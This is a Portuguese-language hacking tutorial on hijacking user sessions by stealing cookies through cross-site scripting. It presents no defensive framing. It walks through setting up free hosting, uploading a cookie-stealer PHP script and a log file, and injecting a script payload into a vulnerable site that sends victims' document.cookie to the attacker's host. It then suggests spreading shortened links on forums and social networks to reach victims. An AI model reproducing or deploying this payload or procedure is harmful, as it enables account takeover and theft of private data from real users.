O script entre sites, que é comumente conhecido como XSS, é uma vulnerabilidade muito simples encontrada em aplicativos da Web. O XSS permite que o invasor execute um código mal-intencionado no site. A vulnerabilidade do XSS permite que o invasor injete algum código nos aplicativos da Web afetados, a fim de contornar o acesso de segurança ao site ou interceptar as informações do usuário e o roubo de cookies. Essa técnica pode ser usada para muitos propósitos, como roubo de cookies, invasão de sites, manipulação de usuários e muito mais coisas que o invasor pode usar. Aqui eu mostrarei como hackear com XSS, se você quiser saber mais sobre isso, você pode verificar este guia completo para XSS cross site scripting ou como hackear com XSS . O XSS é muito útil quando se trata de sequestro de sessão. Então, aqui vou compartilhar como seqüestrar cookies usando o xss.
ENTÃO, COMO SEQÜESTRAR COOKIES USANDO XSS? SEQUESTRO DE SESSÃO
É muito simples sequestrar cookies usando o XSS.
REQUISITOS
Não há uma lista enorme de coisas necessárias para seqüestrar cookies usando XSS. Você só precisa dessas coisas a seguir.
- Painel de Hospedagem (Você pode usar o provedor de hospedagem gratuita como 110mb.com ou você pode usar sua hospedagem premium).
- Site Vulnerável do XSS
- Vítima
PASSOS A SEGUIR
- Crie uma conta em qualquer provedor de hospedagem. Não importa se você comprá-lo ou usar um livre.
- Baixe o script CookieStealer.php que arrebata os cookies da vítima.
- Crie outro arquivo de bloco de notas chamado como log.txt, mas certifique-se de que ele esteja vazio e que você não escreva nada nele. Isso será usado para salvar os cookies das vítimas.
- Carregar os dois arquivos para o servidor de hospedagem usando o gerenciador de arquivos ou por FTP.
- Uploaded ..? Ok, estamos bem para ir agora. Agora copie o URL do CookieStealer.php como abaixo.
- Em seguida, descubra um site vulnerável ao XSS e execute o seguinte script. Se você não souber como encontrar a vulnerabilidade do xss, poderá aprender como hackear o XSS aqui. Certifique-se, você alterar o myhosting.com para o seu próprio nome de site de hospedagem e target.com para xss site vulnerável.
<script language = "JavaScript"> document.location = "http://myhosting.com/CookieStealer.php?cookie=" + document.cookie; document.location = "http://target.com" </ script>
- Você também pode se espalhar em diferentes plataformas, como fóruns e outras redes sociais, encurtando a URL. Assim que alguém abrir, os cookies serão salvos no arquivo log.php .
Isso é tudo. Espero que tenha deixado claro como o sequestro de sessão é feito usando o XSS.
